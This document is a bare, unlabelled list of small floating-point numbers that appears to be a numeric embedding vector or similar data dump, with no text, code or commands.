-0.018906233832240105, -0.00988280400633812, 0.008020826615393162, 0.012362928129732609, -0.028253814205527306, -0.01407413836568594, 0.01950930431485176, 0.0007887020474299788, 0.005480395630002022, 0.03567156940698624, 0.0023142797872424126, 0.023293565958738327, -0.014013831503689289, 0.026851676404476166, 0.02125820517539978, -0.039169374853372574, -0.010259722359478474, -0.02712305821478367, -0.035490650683641434, 0.006411384325474501, 0.0127775389701128, -0.015227509662508965, -0.04094843193888664, -0.025298772379755974, 0.03907891362905502, 0.03989305719733238, -0.012061393819749355, -0.0368475578725338, -0.01298107486218214, -0.023203104734420776, -0.0042252568528056145, -0.006023158319294453, 0.011541245505213737, -0.003371536498889327, -0.029098112136125565, 0.021514510735869408, 0.043903473764657974, -0.0010883522918447852, 0.0055934712290763855, 0.028630733489990234, 0.014843052253127098, 0.015996422618627548, -0.022961877286434174, -0.03515896201133728, -0.0255550779402256, -0.010983406566083431, -0.04465730860829353, 0.025268619880080223, 0.0003206163237337023, 0.03989305719733238, 0.014021369628608227, -0.003100154921412468, -0.018649930134415627, 0.03250545635819435, -0.0029154650401324034, -0.02122805267572403, -0.03518911451101303, 0.01106632873415947, -0.0017489020247012377, 0.0035204191226512194, 0.000732164247892797, -0.013772604055702686, -0.002110743895173073, 0.01502397283911705, 0.012491080909967422, 0.005895006004720926, -0.04875818267464638, -0.0015538467559963465, -0.003209461458027363, -0.03793308138847351, -0.009935572743415833, 0.01461690105497837, 0.026474758982658386, 0.0021032055374234915, -0.011835242621600628, 0.007817290723323822, -0.0071614524349570274, -0.020338524132966995, -0.0059816972352564335, -0.045863449573516846, -0.023112645372748375, -0.016448725014925003, -0.025163082405924797, -0.008638973347842693, -0.010712024755775928, 0.020715443417429924, -0.020685289055109024, -0.00953603908419609, -0.02041390910744667, 0.018680082634091377, 0.016780413687229156, 0.019177615642547607, -0.017850862815976143, -0.021951736882328987, 0.024318784475326538, -0.0015199240297079086, -0.030907319858670235, 0.0049074795097112656, -0.025042468681931496, -0.016659799963235855, -0.009935572743415833, 0.013863064348697662, 0.0009276907658204436, 0.0648299902677536, 0.006083465181291103, 0.0418228805065155, -0.0048622493632137775, -0.036455560475587845, -0.007338603958487511, -0.020745595917105675, -0.012204622849822044, -0.017353329807519913, 0.037420473992824554, -0.014104291796684265, -0.011488477699458599, -0.03892814740538597, 0.004688866902142763, 0.027816588059067726, -0.015815502032637596, -0.007508217357099056, 0.01290569081902504, 0.013455991633236408, 0.029806718230247498, -0.044928692281246185, 0.021951736882328987, 0.0018506700871512294, -0.0116090914234519, -0.029716258868575096, -0.018031783401966095, -0.03337990492582321, -0.024273553863167763, -0.005133630707859993, 0.0116090914234519, 0.010553719475865364, -0.02356494776904583, 0.002253972925245762, 0.010968329384922981, 0.018499162048101425, -0.029595643281936646, -0.0005168495699763298, -0.03630479425191879, -0.006317154970020056, 0.0023934326600283384, -0.003714532358571887, 0.007093606982380152, -0.0035901491064578295, -0.020594829693436623, 0.004982863087207079, -0.00010659727558959275, 0.05430642515420914, -0.02415294013917446, -0.00395010644569993, -0.023851405829191208, 0.009324965067207813, 0.007018223404884338, 0.03226422891020775, -0.007191605865955353, 0.0017630364745855331, 0.02038375474512577, 0.01359168253839016, 0.0025950842536985874, -0.000009054879228642676, 0.004338332451879978, 0.0006280405214056373, -0.012679539620876312, -0.0029041573870927095, 0.019177615642547607, -0.016689952462911606, -0.02204219624400139, -0.0006855205865576863, 0.03585249185562134, 0.01670503057539463, -0.05373350903391838, -0.009287272579967976, -0.006874994374811649, 0.0139459865167737, 0.016976410523056984, 0.00017986081365961581, -0.0030813091434538364, -0.005514318123459816, 0.010357721708714962, -0.01773024909198284, 0.057894688099622726, -0.015815502032637596, -0.019524380564689636, -0.008254515938460827, 0.007044607773423195, -0.013418300077319145, -0.011684474535286427, -0.019177615642547607, -0.019554534927010536, -0.017624711617827415, 0.012551387771964073, -0.0505673922598362, -0.019494228065013885, -0.025690767914056778, 0.011217095889151096, -0.00023027366842143238, 0.007530832663178444, 0.0063699232414364815, 0.01973545551300049, 0.008533435873687267, -0.02505754493176937, -0.024861548095941544, 0.02811812423169613, -0.024318784475326538, 0.024680625647306442, -0.018227780237793922, -0.007391372695565224, -0.025072621181607246, -0.025600306689739227, -0.023489562794566154, -0.009513423778116703, 0.015890885144472122, -0.045652374625205994, 0.008292208425700665, 0.007104914635419846, -0.03859645873308182, 0.018665006384253502, -0.01381029561161995, -0.01938869059085846, -0.027349209412932396, -0.0034770735073834658, -0.006686535198241472, -0.02134866639971733, 0.00017196909175254405, 0.024831393733620644, 0.07972580939531326, 0.00504316994920373, 0.018408700823783875, -0.022328654304146767, 0.015634581446647644, 0.006011850666254759, 0.010010956786572933, 0.011398016475141048, -0.0030341942328959703, 0.019283153116703033, 0.02662552520632744, -0.00002292430326633621, 0.00042049973853863776, 0.0016678645042702556, 0.024288630113005638, 0.009317426010966301, -0.004131027031689882, -0.010885407216846943, 0.007255681790411472, -0.0010223916033282876, -0.00552562577649951, 0.019494228065013885, 0.03172146528959274, 0.0020843595266342163, 0.013252455741167068, -0.02415294013917446, 0.013636913150548935, -0.02970118075609207, -0.01448121014982462, -0.011820165440440178, 0.0038935686461627483, -0.011993547901511192, -0.011578937992453575, -0.004937632940709591, 0.017911169677972794, -0.013772604055702686, 0.013440915383398533, -0.01570996455848217, -0.008465590886771679, -0.01944899745285511, 0.01316953357309103, -0.0016838836017996073, -0.020217910408973694, 0.014503825455904007, 0.004696405027061701, -0.027515053749084473, 0.02739444002509117, 0.0032433841843158007, -0.004572021774947643, -0.01248354185372591, -0.0039274911396205425, -0.015981346368789673, 0.021620048210024834, 0.036787249147892, -0.006841071415692568, 0.016403494402766228, -0.0014690400566905737, -0.0010139108635485172, -0.029429800808429718, -0.017066871747374535, -0.0031887309160083532, 0.014624439179897308, -0.012249852530658245, 0.020549599081277847, -0.0001607793237781152, -0.019343459978699684, -0.02079082652926445, 0.016222573816776276, -0.005476626567542553, 0.01970530115067959, 0.01111155841499567, 0.011081404983997345, 0.015875808894634247, -0.004564483650028706, 0.006162618286907673, 0.029595643281936646, -0.019961606711149216, 0.020956670865416527, -0.04839634150266647, -0.0022841263562440872, 0.02596214972436428, 0.02896242029964924, -0.009807420894503593, 0.026354145258665085, -0.012197083793580532, 0.020248064771294594, -0.01953945681452751, 0.008375129662454128, -0.01077233161777258, -0.005273090209811926, -0.00877466332167387, -0.003976490814238787, 0.012257390655577183, 0.015529043972492218, 0.005895006004720926, 0.016162266954779625, -0.009317426010966301, -0.026640603318810463, -0.011774935759603977, -0.0031604620162397623, 0.02347448654472828, 0.010108955204486847, 0.0301685594022274, -0.007625062018632889, -0.0160567294806242, 0.016192421317100525, 0.014933512546122074, 0.0160868838429451, 0.0009234504541382194, 0.010998482815921307, -0.03491773456335068, -0.01938869059085846, 0.01988622173666954, -0.009626499377191067, -0.020278217270970345, 0.006158849224448204, 0.00949080940335989, -0.006727995816618204, -0.018710236996412277, -0.03160085156559944, -0.021996965631842613, -0.004617252387106419, 0.03033440373837948, -0.020504368469119072, -0.0018808235181495547, 0.004063182044774294, -0.0007882309146225452, -0.012325236573815346, 0.0415816530585289, 0.03515896201133728, 0.020609905943274498, 0.010003417730331421, -0.005521856714040041, -0.0031095780432224274, 0.026565218344330788, -0.02210250310599804, 0.02222311682999134, 0.0036259563639760017, -0.008834971114993095, -0.0005535990931093693, -0.005706546828150749, 0.010320030152797699, 0.024544935673475266, 0.010289876721799374, -0.0020221679005771875, -0.006471691187471151, 0.0020692828111350536, 0.002604507142677903, 0.0127021549269557, -0.01271723210811615, -0.008925431407988071, -0.02178589254617691, 0.007719291839748621, 0.03778231516480446, -0.0016885950462892652, 0.008819893933832645, 0.007922828197479248, -0.020579753443598747, -0.005872390698641539, 0.005687701050192118, -0.0010911792051047087, 0.019720377400517464, 0.021559741348028183, -0.005465318914502859, 0.009091275744140148, 0.02327848970890045, -0.000044788524974137545, -0.04887879639863968, -0.01292076800018549, -0.04179272800683975, 0.014714900404214859, 0.003829492488875985, -0.011058789677917957, -0.0010450066765770316, -0.0006770399631932378, 0.016750259324908257, -0.021484356373548508, 0.01064417976886034, 0.02765074372291565, -0.02449970506131649, 0.001390829449519515, 0.03350051864981651, 0.0009625557577237487, 0.009264658205211163, 0.02204219624400139, -0.03618418052792549, -0.006403846200555563, 0.0006256847991608083, -0.04960247874259949, 0.019690224900841713, 0.022449268028140068, 0.03986290469765663, -0.017443791031837463, -0.005401242524385452, -0.021499434486031532, -0.022916646674275398, -0.008073595352470875, -0.007229297887533903, -0.01907207816839218, 0.006245540454983711, -0.011104020290076733, -0.017790555953979492, -0.023519717156887054, -0.008284669369459152, -0.007101145572960377, -0.019283153116703033, 0.010945714078843594, 0.019237922504544258, -0.007726829964667559, -0.00580454571172595, -0.02949010767042637, 0.0014030792517587543, 0.0081037487834692, 0.014993819408118725, -0.0028928497340530157, 0.0137952184304595, 0.016403494402766228, -0.015468737110495567, 0.005077092908322811, 0.02017267979681492, -0.037390321493148804, 0.01078740879893303, 0.01344845350831747, 0.0029230033978819847, -0.020881287753582, 0.007082299329340458, 0.027484899386763573, -0.00724060507491231, -0.002340664155781269, 0.0017696325667202473, -0.01567981205880642, -0.00022603334218729287, 0.00013039025361649692, 0.008314822800457478, -0.014217367395758629, -0.0009564307983964682, 0.01229508314281702, 0.006166387349367142, 0.009355118498206139, -0.01482043694704771, -0.009347580373287201, -0.008684203028678894, -0.026731062680482864, -0.013192148879170418, -0.009724498726427555, -0.0002537132822908461, 0.0081791328266263, 0.02070036716759205, -0.016418572515249252, 0.025389233604073524, -0.03138977661728859, 0.0139459865167737, 0.001871400629170239, -0.011767396703362465, 0.00989788118749857, 0.03410359099507332, 0.015363199636340141, -0.000508840021211654, 0.006547075230628252, 0.013621835969388485, 0.0006365212029777467, -0.019403766840696335, -0.028871960937976837, 0.026323990896344185, -0.022856339812278748, 0.010757255367934704, -0.006626227870583534, -0.0023670485243201256, 0.001819574274122715, -0.0037955697625875473, 0.0163281112909317, 0.013177072629332542, 0.024454474449157715, -0.0027722360100597143, -0.006226694211363792, 0.006577228661626577, -0.014285213313996792, -0.005815853364765644, -0.013116765767335892, 0.0003144914226140827, -0.016870874911546707, 0.02835935167968273, 0.01664472371339798, -0.01970530115067959, 0.006878763437271118, -0.009520962834358215, -0.028253814205527306, 0.004161180928349495, -0.030093176290392876, -0.014941050671041012, -0.0003387555480003357, 0.033802054822444916, -0.011398016475141048, -0.014865667559206486, 0.021499434486031532, -0.017187485471367836, -0.020971747115254402, 0.043782856315374374, -0.012672001495957375, -0.0026233531534671783, 0.013629375025629997, 0.040315207093954086, 0.007033300120383501, 0.02154466323554516, 0.008284669369459152, -0.015529043972492218, -0.017594557255506516, 0.004504176788032055, 0.01574011892080307, 0.003620302537456155, 0.0028871961403638124, -0.015250124037265778, -0.012950921431183815, -0.027138134464621544, 0.013071535155177116, -0.005005478393286467, 0.006509383209049702, 0.002442432101815939, -0.011835242621600628, 0.00713883712887764, 0.01298107486218214, -0.023489562794566154, -0.01664472371339798, -0.029128264635801315, -0.011970932595431805, -0.0007764521869830787, -0.002105090068653226, 0.007108683697879314, 0.014662131667137146, -0.0254043098539114, 0.0018129781819880009, 0.027695974335074425, 0.03488758206367493, -0.009128967300057411, 0.010696948505938053, -0.014307827688753605, 0.004338332451879978, 0.01895146444439888, 0.0026120455004274845, -0.01090802252292633, -0.0254344642162323, 0.024288630113005638, -0.014941050671041012, -0.005687701050192118, 0.019629918038845062, 0.007779598701745272, 0.004006644245237112, 0.00783990602940321, 0.005864852573722601, -0.029128264635801315, -0.028887037187814713, -0.011164327152073383, -0.0034940349869430065, -0.0029041573870927095, 0.015589350834488869, 0.00518262991681695, 0.011963394470512867, 0.0022916647139936686, 0.015785349532961845, -0.019584687426686287, -0.009030967950820923, 0.0036881479900330305, 0.004850941710174084, -0.0012287544086575508, 0.005672623869031668, -0.002596968784928322, -0.008375129662454128, -0.00824697781354189, -0.004994170740246773, -0.016855796799063683, -0.015815502032637596, 0.01580042578279972, 0.012099085375666618, 0.02327848970890045, -0.005815853364765644, 0.01531796995550394, 0.010146647691726685, -0.009716959670186043, -0.02140897326171398, 0.029942410066723824, 0.0016169805312529206, -0.0030586940702050924, 0.0018742274260148406, 0.015815502032637596, -0.03901860862970352, 0.007756983861327171, -0.011141711845993996, 0.012121700681746006, 0.003232076531276107, -0.004311948083341122, 0.0028871961403638124, 0.021424049511551857, 0.01201616320759058, 0.04459700360894203, 0.0042327954433858395, 0.008480667136609554, 0.012860461138188839, -0.00659230537712574, -0.01932838372886181, 0.0022238194942474365, 0.02952026017010212, 0.014368134550750256, -0.005167553201317787, 0.01200108602643013, -0.008827432058751583, 0.007119991350919008, -0.007945442572236061, -0.010832639411091805, 0.02926395647227764, -0.009332503192126751, 0.019554534927010536, -0.025042468681931496, 0.018634852021932602, -0.01708194799721241, -0.010900484398007393, -0.008458051830530167, -0.012491080909967422, 0.0007076645852066576, -0.021333590149879456, 0.006049542687833309, 0.008352515287697315, 0.007625062018632889, -0.022012043744325638, -0.03784262016415596, 0.00824697781354189, -0.0013003689236938953, 0.0047114817425608635, -0.011933241039514542, 0.019147461280226707, 0.00042285548988729715, 0.0074818329885602, 0.024348938837647438, 0.013056457974016666, -0.010742178186774254, 0.029188571497797966, -0.011202018707990646, -0.014956127852201462, -0.0059816972352564335, 0.00445894617587328, 0.0074818329885602, 0.0033338444773107767, 0.0005649066879414022, -0.0006902320892550051, -0.000944180937949568, -0.002672352595254779, -0.018725313246250153, -0.010342644527554512, -0.012136776931583881, -0.0018054398242384195, 0.00470017408952117, 0.0208511333912611, 0.0022049734834581614, 0.012845383957028389, 0.02362525463104248, 0.0160567294806242, 0.01179755013436079, -0.001756440382450819, 0.0037503396160900593, 0.004734097048640251, -0.006577228661626577, 0.027695974335074425, -0.01360675971955061, 0.021981889382004738, 0.0013870602706447244, -0.009324965067207813, 0.011616629548370838, 0.007444141432642937, -0.00995818804949522, 0.0032019231002777815, -0.005751776974648237, 0.02820858359336853, 0.0006793956854380667, 0.010689410381019115, -0.0013700989075005054, 0.003026655875146389, -0.005533164367079735, -0.01017680112272501, -0.031178701668977737, -0.009626499377191067, 0.0055859326384961605, -0.01359168253839016, -0.012151854112744331, -0.009573730640113354, -0.0038709533400833607, -0.0028909652028232813, 0.00453433021903038, -0.0008221535827033222, 0.0047567118890583515, 0.012596617452800274, 0.018469009548425674, 0.011277402751147747, 0.008593742735683918, -0.004142334684729576, 0.004779327195137739, 0.02154466323554516, 0.01570996455848217, 0.0024311246816068888, 0.02487662434577942, 0.016901027411222458, -0.007331065833568573, -0.0004928209818899632, -0.01938869059085846, 0.008910354226827621, -0.011820165440440178, 0.023580024018883705, -0.013154457323253155, -0.00741775706410408, -0.006893840152770281, 0.009950649924576283, -0.02032344788312912, 0.007248143665492535, 0.003833261551335454, 0.01243831217288971, 0.01461690105497837, -0.018152397125959396, -0.0008320476626977324, -0.0015679810894653201, -0.006166387349367142, -0.031239008530974388, 0.010485873557627201, 0.01126986462622881, -0.004813249688595533, -0.002559276996180415, -0.021740661934018135, 0.013614297844469547, 0.011963394470512867, -0.0004798644222319126, 0.00013710411440115422, -0.0025555077008903027, -0.011179404333233833, 0.004131027031689882, -0.016418572515249252, -0.00851082056760788, -0.008442975580692291, -0.006392538547515869, -0.012611694633960724, 0.02864580973982811, -0.01720256172120571, 0.010621564462780952, -0.01889115758240223, 0.009890343062579632, -0.009166658855974674, 0.0008928258321247995, 0.01985606923699379, 0.01058387290686369, -0.009347580373287201, -0.009166658855974674, -0.008654049597680569, -0.0036542252637445927, 0.02867596223950386, 0.0020334755536168814, 0.009347580373287201, -0.011360324919223785, -0.01907207816839218, -0.006701611913740635, 0.01857454515993595, 0.010350183583796024, -0.0008659703307785094, -0.006984300445765257, 0.014488749206066132, -0.009038507007062435, 0.0004584271810017526, 0.018680082634091377, 0.016418572515249252, 0.009324965067207813, 0.013101688586175442, -0.0020560906268656254, 0.011119097471237183, -0.000014060828107176349, -0.01929822936654091, -0.009505885653197765, 0.02160497009754181, -0.008201747201383114, 0.01340322382748127, -0.01264184806495905, 0.02116774581372738, -0.00019776444241870195, -0.008216824382543564, 0.0033036910463124514, -0.01483551412820816, 0.01813732087612152, 0.009988341480493546, -0.02908303402364254, -0.01228000596165657, -0.004605944734066725, -0.013757526874542236, 0.013923371210694313, -0.027605514973402023, -0.019629918038845062, -0.00395010644569993, -0.0019373613176867366, 0.0230674147605896, -0.02636922150850296, -0.009453116916120052, -0.011443247087299824, -0.021243128925561905, -0.02998763881623745, -0.006449076347053051, -0.00967926811426878, 0.024288630113005638, -0.013893217779695988, 0.016282880678772926, -0.00566508574411273, -0.017217639833688736, -0.022841263562440872, 0.009317426010966301, 0.029806718230247498, -0.010598949156701565, -0.01857454515993595, -0.010810024105012417, -0.003068116959184408, -0.009264658205211163, 0.006400076672434807, 0.006867455784231424, -0.005129861179739237, 0.00487732607871294, 0.0103652598336339, -0.0034356124233454466, -0.0076401387341320515, -0.03010825254023075, 0.006449076347053051, 0.012121700681746006, -0.00023015588521957397, 0.0034695351496338844, 0.007504448294639587, -0.015619504265487194, 0.012084008194506168, -0.0056839315220713615, 0.01175232045352459, 0.0071991439908742905, 0.007146375719457865, 0.028796575963497162, 0.007892674766480923, 0.02020283415913582, -0.009159120731055737, 0.02222311682999134, -0.0026516220532357693, 0.012619232758879662, -0.0017074410570785403, 0.00032956813811324537, -0.006362385116517544, -0.0162074975669384, 0.010229568928480148, 0.006622458808124065, -0.019087154418230057, 0.019268076866865158, 0.002947503002360463, -0.02324833534657955, 0.0042704869993031025, 0.008669126778841019, -0.00673176534473896, 0.025193234905600548, -0.006241770926862955, 0.016388418152928352, 0.009144043549895287, -0.012656924314796925, -0.010945714078843594, -0.0028645808342844248, 0.0060721575282514095, 0.012988612987101078, 0.019283153116703033, 0.011918164789676666, -0.0103652598336339, 0.001459617051295936, -0.007854982279241085, 0.0012551387771964073, -0.010116493329405785, -0.0009587865206412971, 0.020640060305595398, 0.008216824382543564, -0.004997939802706242, 0.022208040580153465, -0.008932969532907009, -0.013011228293180466, -0.011096482165157795, -0.012053854763507843, 0.0006826937315054238, -0.00925711914896965, -0.017353329807519913, 0.01476013008505106, 0.0005427626892924309, -0.010938175953924656, -0.009528500959277153, -0.00013368829968385398, -0.005695239175111055, -0.01078740879893303, -0.006580997724086046, -0.012860461138188839, -0.005951543804258108, -0.01649395562708378, 0.010131570510566235, 0.0010487758554518223, 0.018906233832240105, -0.0028118123300373554, 0.00004031261778436601, -0.052255988121032715, -0.01133017148822546, 0.011616629548370838, 0.0033545750193297863, -0.004930094350129366, 0.006238001864403486, -0.007854982279241085, -0.017971476539969444, 0.01221969909965992, -0.0003818655968643725, 0.015415968373417854, -0.006829764228314161, 0.0005323974182829261, 0.007907751016318798, -0.0161773432046175, 0.03540018945932388, -0.017775477841496468, -0.0074403719045221806, -0.015559197403490543, -0.0002049494651146233, 0.024861548095941544, 0.007930366322398186, -0.023338796570897102, 0.024952007457613945, -0.019494228065013885, -0.018031783401966095, 0.019840992987155914, -0.005020555108785629, -0.029791641980409622, 0.009407887235283852, 0.01365198940038681, -0.00947573222219944, -0.015001358464360237, -0.024243401363492012, 0.0010544296819716692, 0.023851405829191208, 0.014345520175993443, 0.025012314319610596, -0.0013898871839046478, -0.00002466166188241914, -0.0014737515011802316, 0.0069089168682694435, -0.027469823136925697, -0.019403766840696335, -0.008940507657825947, 0.04803450033068657, 0.013335377909243107, -0.007142606656998396, 0.004956478718668222, -0.002591314958408475, 0.008111286908388138, -0.0034808428026735783, -0.0036014567594975233, -0.034736812114715576, 0.02032344788312912, -0.00552562577649951, -0.00009629091073293239, -0.0010346414055675268, 0.00021661038044840097, 0.013749988749623299, -0.006705380976200104, -0.011262326501309872, -0.006750611122697592, 0.00535978190600872, -0.013734911568462849, -0.003032309701666236, 0.016313035041093826, 0.014767668209969997, 0.029897179454565048, 0.016750259324908257, 0.012996151112020016, 0.009015891700983047, -0.012973536737263203, -0.0073951417580246925, -0.014330442994832993, -0.01203124038875103, 0.013802757486701012, 0.024740932509303093, -0.011043713428080082, -0.0009055468253791332, -0.00731598911806941, 0.015725040808320045, -0.004164949990808964, 0.0028532734140753746, -0.0012579656904563308, 0.011639244854450226, 0.0055859326384961605, 0.002201204188168049, 0.013237379491329193, 0.02272064983844757, -0.010553719475865364, 0.0024235863238573074, 0.008812355808913708, 0.02163512445986271, -0.02403232641518116, -0.005273090209811926, -0.009709421545267105, 0.006437768694013357, -0.008608819916844368, 0.003953875508159399, 0.0009342868579551578, -0.002723236568272114, 0.003128423821181059, 0.0072594513185322285, 0.00008881143003236502, -0.000389168388210237, -0.021152669563889503, -0.00940034817904234, 0.008058518171310425, 0.02400217205286026, 0.012800153344869614, 0.016795489937067032, 0.014805360697209835, 0.024047402665019035, 0.007511986419558525, -0.016855796799063683, -0.005623624660074711, -0.0322340726852417, 0.008963122963905334, 0.00336588267236948, -0.0019769377540796995, -0.01139047835022211, 0.010689410381019115, 0.027665821835398674, -0.008254515938460827, 0.015513967722654343, 0.0127775389701128, -0.00925711914896965, -0.01611703634262085, -0.0062719243578612804, 0.0035072271712124348, 0.0065659210085868835, -0.0046210214495658875, -0.003147269831970334, -0.009113890118896961, -0.006366154178977013, 0.0019430151442065835, 0.01763978786766529, -0.01064417976886034, -0.003203807631507516, -0.0009715075721032917, -0.0017639787402004004, -0.017413636669516563, -0.02154466323554516, 0.018936388194561005, -0.010244646109640598, -0.005887467879801989, 0.014126907102763653, 0.013079073280096054, -0.006596074439585209, -0.015415968373417854, 0.009980803355574608, -0.003897337708622217, -0.014752591960132122, -0.00838266871869564, 0.015559197403490543, 0.010267261415719986, -0.015129510313272476, 0.021906506270170212, 0.01889115758240223, -0.004681328311562538, 0.015272739343345165, -0.018649930134415627, -0.003426189534366131, -0.001447367249056697, 0.01003357209265232, 0.0044212546199560165, 0.02210250310599804, -0.022343730553984642, -0.004161180928349495, -0.010764793492853642, -0.01766994222998619, -0.0019317074911668897, -0.015174740925431252, -0.00995818804949522, 0.0038784919306635857, -0.003953875508159399, -0.005209014285355806, 0.020278217270970345, -0.0012843499425798655, -0.0024179324973374605, -0.013297686353325844, -0.020217910408973694, -0.03407343477010727, 0.013471068814396858, 0.006060850340873003, -0.0011401786468923092, -0.008442975580692291, -0.02222311682999134, -0.01223477628082037, -0.011224634014070034, 0.014006293378770351, 0.0018582084449008107, -0.003582610748708248, 0.0011251018149778247, -0.005050708539783955, 0.016313035041093826, -0.0041272579692304134, 0.03796323761343956, 0.03138977661728859, 0.006302078254520893, -0.008872662670910358, -0.0036523407325148582, 0.005774392280727625, 0.005589702166616917, 0.00751952501013875, -0.014669669792056084, -0.0002065984735963866, 0.02867596223950386, 0.01092309970408678, 0.016132114455103874, 0.005103477276861668, -0.005623624660074711, -0.0002911695628426969, 0.024454474449157715, 0.010131570510566235, 0.012362928129732609, 0.003267883788794279, -0.010478335432708263, 0.024318784475326538, -0.0052957055158913136, -0.015921039506793022, -0.016071807593107224, -0.02642952837049961, 0.015664733946323395, 0.01748901978135109, 0.008111286908388138, -0.004059412516653538, 0.0004435860028024763, 0.015287816524505615, -0.0044137160293757915, 0.010191877372562885, -0.011699551716446877, -0.010199415497481823, -0.008360053412616253, -0.002178589114919305, 0.001287176855839789, 0.006637535523623228, 0.02599230222404003, -0.024333860725164413, 0.013297686353325844, -0.007293373811990023, -0.011006021872162819, -0.013614297844469547, 0.0013060227502137423, -0.004372254945337772, -0.0006157906609587371, 0.018785620108246803, -0.02531384862959385, -0.011541245505213737, -0.013832910917699337, 0.002465047175064683, 0.010802485048770905, 0.018680082634091377, -0.005235398653894663, 0.022675419226288795, 0.0017470174934715033, -0.00949080940335989, -0.003222653642296791, -0.02119789831340313, -0.022946801036596298, -0.03316883370280266, -0.0030247713439166546, 0.020896364003419876, -0.008427898399531841, -0.024982161819934845, -0.01699148863554001, -0.0006431172951124609, -0.0015915385447442532, -0.0010459489421918988, -0.004195103421807289, -0.021921582520008087, -0.02849504165351391, 0.0011835242621600628, -0.0021653969306498766, -0.0002706746163312346, -0.023821251466870308, 0.036546021699905396, -0.009121429175138474, -0.015076741576194763, 0.020489292219281197, -0.008292208425700665, -0.021921582520008087, 0.010214492678642273, 0.011669398285448551, -0.002044783206656575, -0.017685018479824066, -0.027077827602624893, -0.012264929711818695, -0.0012400620616972446, -0.012566464021801949, -0.004131027031689882, -0.0046662515960633755, 0.016433648765087128, -0.020504368469119072, -0.010372797958552837, -0.013840449042618275, 0.009204350411891937, -0.00009994230640586466, 0.03443527966737747, 0.0033903822768479586, 0.00511855399236083, 0.0056387013755738735, -0.01010141707956791, -0.030590709298849106, -0.004229025915265083, -0.01564965769648552, -0.014405827037990093, 0.0028306583408266306, -0.013538913801312447, -0.014729976654052734, -0.011337709613144398, 0.037510935217142105, 0.005559548735618591, -0.0160868838429451, 0.02456001192331314, 0.001402136986143887, -0.020986825227737427, -0.006121157202869654, 0.014858129434287548, -0.004628559574484825, 0.0010101416846737266, 0.011970932595431805, 0.0003740916436072439, -0.0030568093061447144, -0.015212432481348515, -0.006807148922234774, 0.0015698657371103764, -0.026414452120661736, -0.021981889382004738, -0.027605514973402023, -0.005337166599929333, -0.027816588059067726, 0.004530560690909624, 0.0025253542698919773, 0.02026314102113247, 0.011948318220674992, -0.011646782979369164, 0.0018374779028818011, 0.018680082634091377, 0.012491080909967422, -0.005838468205183744, 0.015091818757355213, 0.013900755904614925, 0.0063699232414364815, -0.010516026988625526, -0.012302621267735958, -0.027198441326618195, 0.016433648765087128, -0.006980531383305788, -0.004319486673921347, 0.003486496629193425, -0.024258477613329887, 0.0008230958483181894, 0.0058836983516812325, -0.0046134828589856625, 0.017685018479824066, -0.014624439179897308, -0.029625797644257545, -0.0036353792529553175, -0.015355661511421204, 0.01932838372886181, 0.01629795879125595, 0.0007175586652010679, 0.013003690168261528, -0.0035675340332090855, -0.022012043744325638, -0.00885004736483097, 0.006158849224448204, 0.031811926513910294, -0.002374586882069707, -0.029128264635801315, 0.006222925148904324, -0.018589623272418976, 0.019343459978699684, 0.0026817754842340946, -0.0016669222386553884, -0.022298501804471016, -0.004964017309248447, 0.0002883426786866039, 0.006200309842824936, -0.003473304444923997, 0.0004909363924525678, 0.017277946695685387, 0.010116493329405785, -0.01953945681452751, 0.0019251115154474974, 0.02514800615608692, -0.003799338825047016, 0.03013840690255165, 0.00586862163618207, -0.004131027031689882, -0.0016207497101277113, 0.012898152694106102, 0.01203124038875103, -0.009468194097280502, 0.005830930080264807, -0.006381230894476175, -0.019554534927010536, -0.003060578601434827, 0.0032056921627372503, -0.014669669792056084, 0.01717240922152996, 0.005261783022433519, -0.02041390910744667, -0.005521856714040041, -0.008797278627753258, 0.0052957055158913136, 0.019554534927010536, -0.01577027142047882, 0.01770009472966194, -0.003776723751798272, 0.015385814942419529, 0.015235047787427902, -0.014707361347973347, 0.011541245505213737, -0.009324965067207813, 0.0017658633878454566, -0.011141711845993996, 0.015091818757355213, -0.018152397125959396, -0.008601280860602856, -0.010372797958552837, -0.00580454571172595, -0.018634852021932602, 0.0012664463138207793, -0.03772200644016266, 0.02388155832886696, -0.00995818804949522, -0.012649386189877987, 0.005401242524385452, -0.016418572515249252, -0.006158849224448204, 0.003501573344692588, -0.04830588027834892, 0.008887738920748234, -0.01564965769648552, 0.00435717822983861, 0.025178158655762672, 0.012212160974740982, -0.010938175953924656, 0.004402408376336098, -0.007960519753396511, -0.010960791260004044, 0.01195585634559393, 0.0028721194248646498, 0.006799610331654549, 0.014420903287827969, -0.0185443926602602, -0.021620048210024834, -0.003175538731738925, 0.00012226295075379312, -0.02082098089158535, 0.014827976003289223, 0.004587098490446806, -0.04372255131602287, 0.00027091021183878183, 0.0029795411974191666, -0.0068109179846942425, 0.01200108602643013, -0.0023142797872424126, -0.01783578470349312, -0.010727101936936378, 0.025886764749884605, -0.010500950738787651, -0.004244102630764246, 0.0030718862544745207, 0.00566508574411273, 0.003343267599120736, -0.0075006792321801186, -0.005167553201317787, 0.007285835687071085, 0.015619504265487194, -0.0081791328266263, -0.00001529759174445644, 0.0068109179846942425, 0.0138706024736166, -0.023821251466870308, 0.017775477841496468, -0.0026478527579456568, 0.033741749823093414, -0.0015415968373417854, -0.003262229962274432, -0.017805632203817368, 0.010900484398007393, -0.0016574993496760726, 0.0010148531291633844, 0.008171593770384789, -0.016222573816776276, -0.009528500959277153, -0.007922828197479248, -0.002169166225939989, -0.013719835318624973, 0.0031510391272604465, 0.01502397283911705, -0.007368757389485836, -0.005706546828150749, -0.00501678604632616, 0.019192691892385483, 0.013501222245395184, -0.010010956786572933, 0.0031623465474694967, 0.013689681887626648, 0.03322913870215416, 0.012837845832109451, 0.005050708539783955, -0.009151582606136799, -0.01670503057539463, 0.006596074439585209, -0.02820858359336853, 0.006275693885982037, 0.006437768694013357, -0.0055934712290763855, 0.021951736882328987, -0.0028005046769976616, 0.009732036851346493, -0.002186127472668886, -0.012061393819749355, 0.001889304257929325, -0.0024009710177779198, 0.014081676490604877, 0.009234504774212837, 0.0028080432675778866, -0.004443869460374117, -0.000603540800511837, -0.009136505424976349, -0.03567156940698624, -0.0008183844038285315, -0.011480938643217087, -0.0002454681962262839, -0.015076741576194763, 0.0011722167255356908, 0.007719291839748621, 0.007719291839748621, 0.02814827673137188, 0.01708194799721241, -0.012204622849822044, 0.009226965717971325, 0.017262868583202362, 0.007930366322398186, -0.0011712743435055017, 0.014473672024905682, 0.014390749856829643, 0.018031783401966095, 0.008442975580692291, 0.00673176534473896, 0.003897337708622217, 0.010990944691002369, -0.01904192566871643, -0.007711753249168396, 0.0010026033269241452, 